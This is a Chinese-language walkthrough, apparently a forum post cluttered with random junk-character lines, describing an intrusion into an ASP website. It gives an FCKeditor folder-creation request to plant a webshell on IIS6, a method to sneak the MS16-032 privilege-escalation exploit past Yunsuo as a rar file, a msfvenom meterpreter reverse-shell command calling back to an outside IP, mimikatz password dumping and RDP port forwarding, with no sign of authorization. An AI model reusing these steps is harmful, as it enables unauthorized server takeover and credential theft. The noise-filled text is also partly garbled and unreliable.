# H2 @1 a$ c! W( E* U9 ~) S8 F
" h9 ]. B6 S, ?* U4 {7 |
+ B8 \: a& h' \" S
% n3 p( Y; Z- X, N
, x" r9 Y9 F0 r6 r+ O, r6 @ ( w+ s" l" G# ]# ^0 C+ i; g8 ^
3 \$ t N9 V- A3 X, R. N
一、 利用getwebshell篇
& X: X$ M: |' x& L
$ }' A+ f& n7 W. N9 ]( _& P% W首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: * y' n# M. L: e9 @+ V
9 ~1 ?, J3 }+ @8 h; H
1 U6 ~ J' F$ U/ c+ q7 a; r
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 7 U8 M: ?! Z! T3 z O: o
1 r5 J# `, f( [" v: t- p下面我们构造一个asp目录,如: - m6 s3 Q4 [6 J, j' o( A
5 c5 x. {8 n$ |0 p+ I3 S" A6 o # p. X$ X5 k& c0 z- e$ y
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
$ V, K& _' k# s* v5 ~ `3 b2 E / o" f( J: s2 }( ^: P% |8 s2 V, q
( {/ j( I: }0 O! l9 a f
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 . F$ p9 F9 P6 |$ T) N
, {- J1 L0 l8 J4 p0 |2 H, C% X9 @
一、 绕过安全狗云锁提权并且加账号 7 H' A5 ^/ V, C Z
/ ~3 m, x; D5 x6 e' M) ?
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
' b Q& T- \8 |" s0 m; ] 1 j7 z& X% N: V( G5 S6 b
如图:
& r6 G3 U' |/ i- r" @8 j! H 8 o# j. e# f4 Z1 Q% R' E* P
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit , t' K% T/ P3 u j; ?1 O3 n
0 F. z" F2 i9 I+ {' o8 e
一、 利用metasploit
8 m2 E* D5 G8 x% y. `4 V
5 W- `) J% U. F; I% m* m3 {4 _首先用pentestbox生成一个64位的payload如下命令
* E6 k1 m; B' h. _; G
$ l @* e1 f" C3 B) D. K# w2 V/ EmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
6 i4 `5 n' V0 G3 {3 R 4 r V7 t( W$ c3 g' C4 l
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: 7 h3 v7 d0 J0 d6 D$ D* D; H8 X% }
1 B- g* B& Y) P I; k( j6 N1 [下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: ' w- N% g6 l" ^# T
" A% A# V2 X8 z6 C7 l8 X& ~. ^下面我们来做一个监听如下命令:
5 b/ p/ x! t/ P
l5 J1 d# w" Y1 o) z4 V, l7 n8 wportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: $ t. P' h0 b( V! ?' `$ F- U
4 w5 Y! D" x+ _0 R6 c; c
" L0 |' d' A+ m/ X | $ p; x" }1 A' [: e
/ `+ q1 g( P) N/ e7 y( C
0 y2 [5 H3 K0 z# k% ?& A- z/ L
4 Q5 _* {% }" n; P; {5 F6 r- p$ e" L
% e- ]# m% ]# Y | M& `* K0 O- X$ B+ f
- ^3 F! K- L9 L+ a5 r
6 C! v+ H: K% L" A: H# o5 n
& R$ Z6 @; h& }; U& @ " E0 \* y# G' y1 Z) A0 y0 v
! ]& T8 t& ^$ r Y
* C6 l, N# K! X/ z3 j/ |- x
: r0 H( e/ [9 `" s! K
" I/ O# }$ i2 n$ [+ o8 `' n |